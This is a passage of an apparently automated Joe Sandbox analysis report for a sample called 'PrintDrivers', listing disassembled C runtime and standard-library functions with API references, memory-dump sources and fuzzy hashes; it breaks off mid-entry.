                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: d52ae89de7add251f6771e222e193c5e19a064e7f5294b6e2a0d7d8cb69fa2b2
                                                                    • Instruction ID: a9891b03a70ce2a4e77445cfa8ef6c8c621640f79fa4099d9358c14ba0a46b34
                                                                    • Opcode Fuzzy Hash: d52ae89de7add251f6771e222e193c5e19a064e7f5294b6e2a0d7d8cb69fa2b2
                                                                    • Instruction Fuzzy Hash: A501ED3590021A8FCF04FBA0C859ABE7FB1FF84324F240409E810AB291DF708E0A8B81
                                                                    Function 005967D0 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005967D7
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005967E1
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596832
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596852
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 19e0a230b7f0dab140f1dd8c224b1ada4070b830c8d75413f3d14f0518c7a187
                                                                    • Instruction ID: a13ceb7e9bbd1e66d90e4dbfc5ca22e78576a12216f42ea3becbeba09d6ce87a
                                                                    • Opcode Fuzzy Hash: 19e0a230b7f0dab140f1dd8c224b1ada4070b830c8d75413f3d14f0518c7a187
                                                                    • Instruction Fuzzy Hash: E901A1359002168BCF05FBA08859ABD7FB1FFC4320F240508E4146B291DF709E498B81
                                                                    Function 00596865 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059686C
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00596876
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005968C7
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005968E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: b41692c23ee74737950bf85aae53d6d4563be8be2c1ecd6e81a1d3dd91cc0e17
                                                                    • Instruction ID: b2bf97f0e550b743f8d85f1ce2dabf8a56d238c4b3edc18ef9d8859b51e3b3f0
                                                                    • Opcode Fuzzy Hash: b41692c23ee74737950bf85aae53d6d4563be8be2c1ecd6e81a1d3dd91cc0e17
                                                                    • Instruction Fuzzy Hash: E501613590451B9BCF05EBA4C849ABD7FB1FFC4320F144509E855AB291DF709E099B81
                                                                    Function 005A083F Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A0846
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A0850
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A08A1
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A08C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 788b4b94f8a0664ffcb853be1216e7a54f01d1610ee42ab3ef3c331ff2761efd
                                                                    • Instruction ID: 96bf111d1893925d4ff64851bd3768149e3b32dfc0919e3d30bf34b4fa62151c
                                                                    • Opcode Fuzzy Hash: 788b4b94f8a0664ffcb853be1216e7a54f01d1610ee42ab3ef3c331ff2761efd
                                                                    • Instruction Fuzzy Hash: E801A13590021B9FCB05EBA08859ABD7FB1FF85320F144508F8106B2D1DF749E468BC1
                                                                    Function 005A08D4 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A08DB
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A08E5
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A0936
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A0956
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: b00686f6ca4102910435f8201a60601529169c727337d37a90e774dd19753f5e
                                                                    • Instruction ID: 8bbd33efcd345bf2a92bfaef362f262fdf1086d7f88194db0e74428389bbcb4b
                                                                    • Opcode Fuzzy Hash: b00686f6ca4102910435f8201a60601529169c727337d37a90e774dd19753f5e
                                                                    • Instruction Fuzzy Hash: A901A13590011A8FDB05EBA0C859ABF7FA5FFC5310F144508F450AB2D2DF709E059B81
                                                                    Function 005A0A93 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A0A9A
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A0AA4
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A0AF5
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A0B15
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 9222010c6ae9f2a0e87df78c4b68d84f98c31c856de8700096493be277988249
                                                                    • Instruction ID: 9e5b7feb7604f1afd7e76a78111c62c81df533783b6b79b3faf03b13eb57b865
                                                                    • Opcode Fuzzy Hash: 9222010c6ae9f2a0e87df78c4b68d84f98c31c856de8700096493be277988249
                                                                    • Instruction Fuzzy Hash: 3201C03590021A9BCB05EFA0C849ABE7FA5FFC5310F244508F851AB2D2DF749E069B90
                                                                    Function 005A0B28 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A0B2F
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A0B39
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A0B8A
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A0BAA
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: dd60e6683fa279d6045984c5f02b86fc7e06b559df34e7e128da7de7f6d07f0a
                                                                    • Instruction ID: 90d92c4eda412d93de625f4d806a930865f6bf608085d90e6bcf705a5d8eb031
                                                                    • Opcode Fuzzy Hash: dd60e6683fa279d6045984c5f02b86fc7e06b559df34e7e128da7de7f6d07f0a
                                                                    • Instruction Fuzzy Hash: CD01A13590022A8FCB05EBA0C849ABD7FA1FFC5320F150508E460AB2D2DF709E058B90
                                                                    Function 00595CC1 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595CC8
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595CD2
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00595D23
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00595D43
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: e245573263e8a1eaf88aeb49d842871590286b2ea86e2b8c9c61c62e9293a8b3
                                                                    • Instruction ID: 1ccb587f9736fd39f4aa06ba6e111443ec7fddf7716382b8a59d6192132c25b5
                                                                    • Opcode Fuzzy Hash: e245573263e8a1eaf88aeb49d842871590286b2ea86e2b8c9c61c62e9293a8b3
                                                                    • Instruction Fuzzy Hash: 7201613590061A9BCF06EBA4884DABE7FA5FF84310F550549F8156B2D1EF709E468BC1
                                                                    Function 00590D0D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00590D14
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00590D1E
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00590D6F
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00590D8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 2bbd212712c8cbef11962f847b483a50bb672aaf4016967bb8b02b7c7ba22fc5
                                                                    • Instruction ID: ac15f9e27e4f478260129b88be468ab5a21dcf1193718e146e9f3cad73f66e8b
                                                                    • Opcode Fuzzy Hash: 2bbd212712c8cbef11962f847b483a50bb672aaf4016967bb8b02b7c7ba22fc5
                                                                    • Instruction Fuzzy Hash: B501A1359002169FCF05EBA4C849ABE7FB5FFC4310F141908E9216B2D1DF74AE458B80
                                                                    Function 00590DA2 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00590DA9
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00590DB3
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00590E04
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00590E24
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: c74c81ba9a4e3596781b8b0a0df4ce1bbd3e87187177f32db6e26ed8176b2e86
                                                                    • Instruction ID: 5d235663d36c510bfcb37fa306862349963795e8f1aab03bb1ebc7dc5d66ef8b
                                                                    • Opcode Fuzzy Hash: c74c81ba9a4e3596781b8b0a0df4ce1bbd3e87187177f32db6e26ed8176b2e86
                                                                    • Instruction Fuzzy Hash: 8E01A1359002278FCF05EBA4C849ABE7FA5FFC4710F250948E8256B2D1DF709E468B80
                                                                    Function 00590E37 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00590E3E
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00590E48
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00590E99
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00590EB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 93d4c5389002c38e5eab19a6e039228890c17eda32cfcb5e2f16ef1d3e72cd40
                                                                    • Instruction ID: e28856ca548c05d7bea9258d43631789da73975d0e1ce6c93e73b6ff4b387a6e
                                                                    • Opcode Fuzzy Hash: 93d4c5389002c38e5eab19a6e039228890c17eda32cfcb5e2f16ef1d3e72cd40
                                                                    • Instruction Fuzzy Hash: CA01A1359006279FCF05FBA08849ABE7FA9FFC4720F144908E8156B2D1DF749E068B81
                                                                    Function 005C40D6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,005C3ACC,00000000,00000001,00000000,00000000,?,005C2D22,?,00000000,00000000), ref: 005C40ED
                                                                    • GetLastError.KERNEL32(?,005C3ACC,00000000,00000001,00000000,00000000,?,005C2D22,?,00000000,00000000,?,00000000,?,005C326E,00000010), ref: 005C40F9
                                                                      • Part of subcall function 005C40BF: CloseHandle.KERNEL32(FFFFFFFE,005C4109,?,005C3ACC,00000000,00000001,00000000,00000000,?,005C2D22,?,00000000,00000000,?,00000000), ref: 005C40CF
                                                                    • ___initconout.LIBCMT ref: 005C4109
                                                                      • Part of subcall function 005C4081: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,005C40B0,005C3AB9,00000000,?,005C2D22,?,00000000,00000000,?), ref: 005C4094
                                                                    • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,005C3ACC,00000000,00000001,00000000,00000000,?,005C2D22,?,00000000,00000000,?), ref: 005C411E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: d16d7a9f9d6dac156735b592e085c8f2d32a424ec080e7044a43fd4c744a2ddf
                                                                    • Instruction ID: 6ac99b0e14c352b5192cb18eb489783d46fa3d367baca7fc2a89bce56075f9ad
                                                                    • Opcode Fuzzy Hash: d16d7a9f9d6dac156735b592e085c8f2d32a424ec080e7044a43fd4c744a2ddf
                                                                    • Instruction Fuzzy Hash: C5F01C36440125BFCF222FD1DC0CE893F26FB683B1B084015FA1D96121C6328864EF90
                                                                    Function 005B475D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 005B4766
                                                                      • Part of subcall function 005B6238: HeapFree.KERNEL32(00000000,00000000,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?), ref: 005B624E
                                                                      • Part of subcall function 005B6238: GetLastError.KERNEL32(?,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?,?), ref: 005B6260
                                                                    • _free.LIBCMT ref: 005B4779
                                                                    • _free.LIBCMT ref: 005B478A
                                                                    • _free.LIBCMT ref: 005B479B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 0c1badbf56d188aae96da00ccd9c87ce397536a78bb5bcdd989b162fe3942e85
                                                                    • Instruction ID: 01a41c102a7566aab5c1e5a5450491eab8b09a218f7733a6259a3b60de99bbe4
                                                                    • Opcode Fuzzy Hash: 0c1badbf56d188aae96da00ccd9c87ce397536a78bb5bcdd989b162fe3942e85
                                                                    • Instruction Fuzzy Hash: 29E04F7C8009B29E96196F11BC858897E26FBF87413404207F4914E231C7391019FFCC
                                                                    Function 00592324 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0059232B
                                                                      • Part of subcall function 00590ECC: __EH_prolog3.LIBCMT ref: 00590ED3
                                                                      • Part of subcall function 00590ECC: std::_Lockit::_Lockit.LIBCPMT ref: 00590EDD
                                                                      • Part of subcall function 00590ECC: std::_Lockit::~_Lockit.LIBCPMT ref: 00590F4E
                                                                    • _Find_elem.LIBCPMT ref: 0059253D
                                                                    Strings
                                                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 00592393
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                    • API String ID: 2544715827-2799312399
                                                                    • Opcode ID: 7fb17492e21adf09f0eed3c26de2583ddff9ccc46f72280fdf58b1755716ad2c
                                                                    • Instruction ID: 68d2be95d3589d40b70172504f3a0d1ea99191c38f8cfacaf091211b3a5b714c
                                                                    • Opcode Fuzzy Hash: 7fb17492e21adf09f0eed3c26de2583ddff9ccc46f72280fdf58b1755716ad2c
                                                                    • Instruction Fuzzy Hash: 95D1A931D04289AEDF25DBA8C494BECBFB6BF45310F684459D8896F283DB349D86CB50
                                                                    Function 00598D11 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 347COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00598D1B
                                                                      • Part of subcall function 005966A6: __EH_prolog3.LIBCMT ref: 005966AD
                                                                      • Part of subcall function 005966A6: std::_Lockit::_Lockit.LIBCPMT ref: 005966B7
                                                                      • Part of subcall function 005966A6: std::_Lockit::~_Lockit.LIBCPMT ref: 00596728
                                                                    • _Find_elem.LIBCPMT ref: 00598F6B
                                                                    Strings
                                                                    • 0123456789ABCDEFabcdef-+Xx, xrefs: 00598D92
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                    • API String ID: 2544715827-2799312399
                                                                    • Opcode ID: c89dec89243e602de3999a9be8640af64b61893639f04696883223fb89d42085
                                                                    • Instruction ID: 87357737f86f0ce47a8322f69a687b94fff028ebde27918eb402a2b410199c3f
